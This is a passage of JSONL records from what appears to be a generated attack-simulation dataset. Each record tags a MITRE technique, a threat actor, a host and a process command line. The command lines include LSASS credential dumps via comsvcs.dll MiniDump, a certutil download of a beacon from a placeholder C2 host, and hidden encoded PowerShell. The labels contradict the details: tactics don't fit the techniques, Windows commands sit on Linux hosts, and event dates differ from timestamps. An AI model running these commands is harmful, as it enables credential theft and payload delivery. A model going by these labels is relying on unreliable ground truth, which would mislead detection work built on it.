UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-08-18T15:37:37.000Z","user":{"name":"i-b19748ntsbsk","sid":"S-1-5-21-428445333-592071623-5961"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20260515T001229000Z_0016991","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.199.203.95","name":"AZURE-VM-W6HJ2WMB2P","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16991FIN7T1566.001"},"network":{"domain":"github.com","dst_ip":"1.116.107.11","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-02-28T17:00:55.000Z","user":{"name":"CORP\\sbadzqqxx4jt","sid":"S-1-5-21-653462042-166352063-7312"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Credential Access"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20260209T044417000Z_0016993","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.38.133.125","name":"APP-WEB-QKOX2J20YR","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16993APT41T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.75.15.12","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3415 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-02-14T05:40:20.000Z","user":{"name":"i-u6h624c779ai","sid":"S-1-5-21-974121940-682201223-1653"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution","Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20250830T083848000Z_0016995","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.86.237.144","name":"IAM-ROLE-HC5OVAGB9G","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16995APT41T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.55.90.18","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3731 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-10-10T08:12:38.000Z","user":{"name":"azuread\\3zxy1d4r5874","sid":"S-1-5-21-673303523-266222800-8735"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Reconnaissance","Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20260208T081532000Z_0016997","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.69.12.70","name":"DB-ORACLE-ZA3PJTILVV","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16997Lapsus$T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.65.107.165","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3487 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-08-18T18:21:22.000Z","user":{"name":"svc_50aq5jyrdy0f","sid":"S-1-5-21-117671566-384578561-1180"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20261127T033037000Z_0016999","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.87.55.178","name":"IAM-ROLE-S6VEA43LM6","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16999UNC4841T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.103.82.250","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-07-05T23:50:58.000Z","user":{"name":"arn:aws:iam::qzvxtc231bp5","sid":"S-1-5-21-828438921-126673973-3126"}}